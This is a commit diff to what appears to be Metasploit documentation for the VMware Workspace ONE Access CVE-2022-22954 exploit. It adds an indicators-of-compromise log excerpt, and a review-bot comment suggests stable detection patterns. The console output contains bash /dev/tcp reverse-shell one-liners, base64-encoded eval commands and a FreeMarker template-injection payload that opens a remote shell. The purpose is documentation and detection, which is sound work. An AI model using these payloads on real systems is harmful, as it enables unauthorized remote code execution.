Add log IOC

William Vu
2022-05-03 02:19:43 -05:00
parent b2994aa8d8
commit 4ea72bb7a7
@@ -66,17 +66,27 @@ msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set verbos
verbose => true
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > run
[+] bash -c '0<&174-;exec 174<>/dev/tcp/192.168.0.4/4444;sh <&174 >&174 2>&174'
[+] bash -c '0<&159-;exec 159<>/dev/tcp/192.168.0.4/4444;sh <&159 >&159 2>&159'
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing command: bash -c {eval,$({echo,ZWNobyB5dGdJRGVVaVM=}|{base64,-d})}
[*] Executing command: bash -c {eval,$({echo,ZWNobyAzUjNQazhpemd6}|{base64,-d})}
[+] The target is vulnerable.
[*] Executing cmd/unix/reverse_bash (Unix Command)
[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTM4LTtleGVjIDEzODw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEzOCA+JjEzOCAyPiYxMzgn}|{base64,-d})}
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55079) at 2022-05-02 20:17:23 -0500
[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:57862) at 2022-05-03 02:33:24 -0500
id
uid=1001(horizon) gid=1003(www) groups=1003(www),1001(vfabric),1002(pivotal)
uname -a
Linux photon-machine 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux
```
## IOCs
### `/opt/vmware/horizon/workspace/logs/greenbox_web.log`
```
[snip]
2022-05-03 07:33:17,988 WARN (Thread-147) [com.vmware.endusercatalog.ui.web.UiApplicationExceptionResolver.resolveException] <GreenBox> <correlation_id: fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f> <tenant_id: zt1myh6phvlz> <client_ip: 192.168.0.2> <username: > <device_id: > - Additional error info for requestId fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f which resulted in return code 400, mapped to error code auth.context.invalid and, error is: {"code":"auth.context.invalid","message":"Authorization context is not valid. Login request received with tenant code: zt1myh6phvlz, device id: null, device type: ${\"freemarker.template.utility.Execute\"?new()(\"bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}\")} and token revoke status: false."}, mapped exception class :class com.vmware.endusercatalog.auth.InvalidAuthContextException
[snip]
```
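Review bot: the new IOCs section quotes a single concrete log line whose payload will not match what a defender sees, so the doc should name the stable indicators rather than one sample; the hunk itself shows that the encoded payload changes on every run (`ZWNobyB5dGdJRGVVaVM=` vs `ZWNobyAzUjNQazhpemd6`, fd 138 vs fd 101 in the two reverse_bash lines), and only the second run's blob appears in the log excerpt. Suggest adding a sentence under the `greenbox_web.log` heading stating what to pattern on: a `WARN` from `UiApplicationExceptionResolver.resolveException` mapped to error code `auth.context.invalid`, where the `device type:` field contains `${"freemarker.template.utility.Execute"?new()(...)}` instead of a device type string, with `client_ip` identifying the requester. It would also help to note that the log timestamp is UTC (07:33:17 here corresponds to the 02:33:24 -0500 session line above), since the two timezones in the excerpt will otherwise read as unrelated events.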